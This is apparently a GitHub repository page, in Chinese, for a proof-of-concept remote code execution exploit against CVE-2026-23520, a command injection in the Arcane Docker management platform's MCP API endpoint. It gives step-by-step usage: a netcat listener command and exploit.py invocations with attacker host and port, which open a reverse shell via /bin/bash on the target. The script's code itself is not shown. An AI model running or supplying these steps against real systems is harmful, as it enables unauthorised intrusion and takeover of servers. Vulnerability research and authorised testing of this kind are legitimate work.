cypher-21/CVE-2026-23520

GitHub: cypher-21/CVE-2026-23520

针对 Arcane Docker 管理平台 MCP API 命令注入漏洞(CVE-2026-23520)的远程代码执行 PoC 利用脚本。

Stars: 1 | Forks: 0

# CVE-2026-23520 ## MCP API 远程代码执行 (RCE) PoC ## 📌 概述 本仓库包含针对远程代码执行 (RCE) 漏洞的概念验证 (PoC) 利用代码,该漏洞影响暴露了易受攻击 MCP API 端点(通常为 `/api/mcp/connect`)的应用程序。 该漏洞允许通过精心构造的 API 请求执行系统级命令。 ## 🚀 快速开始 ### 1. 启动监听器 ``` nc -lvnp ATTACKER_PORT ``` ### 2. 运行 exploit ``` python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT ``` ## 📥 用法 ``` python3 exploit.py --lhost --lport [options] ``` ## 🔑 必选参数 | Argument | Description | | -------- | ------------------------- | | target | 目标 IP、域名或 URL | | --lhost | 攻击者 IP | | --lport | 攻击者端口 | ## 🔧 可选参数 | Flag | Description | | -------------- | ------------------------------ | | -p, --port | 目标端口 (默认: 443) | | -s, --scheme | http 或 https (默认: https) | | -e, --endpoint | API 端点路径 | | -t, --timeout | 请求超时时间 | | -v, --verbose | 调试输出 | ## 🧪 示例 ``` python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444 ``` ``` python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444 ``` ## 🧠 注意事项 * 超时不一定意味着失败。 * 在利用前请确保你的监听器正在运行。 * Payload 假定目标上可用 `/bin/bash`。 ## ⚠️ 免责声明 仅供授权测试和教育用途。 ## 👨‍💻 作者 Parosh B
标签:API安全, Arcane, CISA项目, CVE-2026-23520, Docker管理平台, JSON输出, MCP API, PoC, Python, RCE, 反弹Shell, 命令注入, 攻击脚本, 无后门, 暴力破解, 系统入侵, 编程工具, 网络安全, 输入验证缺失, 远程代码执行, 逆向工具, 隐私保护, 高危漏洞